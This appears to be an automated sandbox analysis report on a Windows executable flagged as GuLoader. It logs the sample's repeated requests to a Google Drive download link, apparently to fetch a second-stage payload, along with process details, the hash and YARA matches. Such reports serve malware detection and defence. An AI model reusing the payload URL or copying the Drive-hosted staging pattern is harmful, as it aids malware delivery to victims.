                                                        2024-12-16 16:59:01 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:02 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6YkRbkhsPgabLfwdRj3a0Um4M52cmg7s82KXAxASjBrJiR_diGnEX1gQ-BMAsVi5rA
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:01 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-gIhWpheFdd3bBCoyhR1Wvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 30 32 56 70 6d 6c 6b 45 72 4e 63 41 77 34 6f 48 56 4e 47 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F02VpmlkErNcAw4oHVNGvg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.650008172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:04 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:04 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-aLr2Qz8GvadAU6Y2w5nDmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.650014142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:06 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:07 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6n--IN87so5snPV0lzFrTxOgZ3H-N-WcX8BWY7oqvmqyjaiOFvT-ucHkMPrltomvT9
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:07 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-y3DZUCCGOp_7mkiYWAKEuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 37 50 61 54 71 58 41 5a 39 6f 43 70 35 67 4f 65 62 61 33 6a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y7PaTqXAZ9oCp5gOeba3jg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.650022172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:09 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:10 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:10 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ZYRI-tJcfKSRkO3W2x2JVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.650028142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:12 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:13 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4WtiB1oje2811J_yZ9tVZUUwQnGXJ6W4T96k0HN-gBOEZlQMKOQ8rvcBNam8DI121K
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:12 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-OoBlue0n3HAxx7RpMXxZNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 79 75 74 51 33 66 57 6b 32 68 2d 65 4e 31 5a 5f 6c 4f 71 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VyutQ3fWk2h-eN1Z_lOqXA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.650029172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:14 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:15 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-Qx2DywhPpgs4cXlOvPXrCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.650030142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:59:17 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:18 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6rInwiGldG2Eu4HdI1VJvgvpuwtGPGOCfVZD7iFbmBHqwSKXW5jpW_K4izTliwLvdR
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:18 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-NCCqdR7YFhYK_Uln0jJpgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 45 5a 4e 36 6e 33 73 31 4a 46 45 34 37 4e 79 6f 74 39 47 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NEZN6n3s1JFE47Nyot9GMA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:11:57:11
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
                                                        Imagebase:0x400000
                                                        File size:534'840 bytes
                                                        MD5 hash:01B2B1469623862352F36C9A1D2CA1D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2354906620.0000000006A84000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:11:57:22
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
                                                        Imagebase:0x400000
                                                        File size:534'840 bytes
                                                        MD5 hash:01B2B1469623862352F36C9A1D2CA1D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3502635941.0000000003614000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:20.1%
